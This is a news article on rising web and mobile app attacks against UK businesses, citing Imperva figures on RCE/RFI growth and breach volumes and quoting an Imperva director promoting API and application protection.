Attacks on web apps may lead to a crappy appy Christmas

• Web app attacks on UK businesses have jumped by 251% since October 2019
• Imperva found that attacks are increasing on average by 22% per quarter
• The pandemic placed immense urgency on businesses to get all kinds of digital transformation projects live as quickly as possible

Web apps and mobile apps are now an integral part of modern society. Almost all businesses rely on applications to connect with their customers and better comprehend business needs.

While the reliance on apps have increased, the reality is that cybercriminals are also targeting both web and mobile apps to launch cyberattacks on users and organizations. Such attacks have been increasing globally and are expected to continue throughout the holiday period, especially with everyone using apps.

According to research from Imperva, web app attacks on UK businesses have jumped by 251% since October 2019. And more alarmingly, Imperva found that attacks are increasing on average by 22% per quarter, alarmingly, with a 68% surge from Q2 to Q3 2021, showing how web app attacks are continuing to balloon in the run-up to Christmas.

As such, both organizations and consumers are at risk of suffering from a ‘crappy appy’ Christmas. For businesses, the rise of these attacks means organizations are at a heightened risk of encountering data leakage or data scraping incidents, in which sensitive customer data is placed in the hands of attackers.

It’s not all ‘crappy appy’

The problem with apps, be it web or mobile, is that both consumers and businesses are extremely dependent on them today. This dependence makes it harder to secure applications as companies keep on adding new features to their apps.

At the same time, almost all apps today require users to input some form of data. Be it personal details or payment information, cybercriminals want to have this data. And they have been successful in the past in getting them.

Remote code execution (RCE) or remote file inclusion (RFI) attacks, which jumped by 271% is an example. RCE / RFI attacks target businesses’ websites and servers, and are used by hackers to steal information, compromise servers, or even takeover websites and modify their content.

Earlier this year, Imperva Research Labs found that half (50%) of all data breaches begin with web applications. With the number of breaches increasing by 30% annually, and the number of records stolen is going up by a staggering 224%, it’s estimated that 40 billion records will be compromised by the end of 2021, with web apps vulnerabilities likely responsible for around 20 billion.

The biggest pitfall is, when apps are compromised, the company’s reputation is at stake as well. Many organizations have been criticized and faced huge losses whenever their applications go offline.

Dependence on web and mobile apps

According to Peter Klimek, Director of Technology at Imperva, the pandemic placed immense urgency on businesses to get all kinds of digital transformation projects live as quickly as possible, and that is almost certainly a driving factor behind this surge in attacks.

“The changing nature of application development itself is also hugely significant. Developments like the rapid proliferation of APIs and the shift to cloud-native computing are beneficial from a DevOps standpoint, but for security teams, these changes in application architecture and the accompanying increased attack surface is making their jobs much, much harder,” added Klimek.

Losses relating to fraud and cybercrime have spiraled out of control during the pandemic, with the National Fraud Intelligence Bureau estimating that around £1.3bn was lost in the first half of 2021 alone, more than three times the amount lost during the same period in 2020. These figures suggest that the problem will continue to worsen throughout 2022.

Klimek pointed out that businesses are seeing more traffic through their web applications than ever before, in particular APIs.

“More than 70% of web traffic now comes through APIs, meaning businesses’ exposure is only getting higher. It’s no longer enough to have a WAF in place and hope for the best – businesses need to invest in a comprehensive Web Application and API Protection (WAAP) stack featuring elements like RASP and Advanced Bot Protection, allowing them to secure everything from edge to database,” he explained.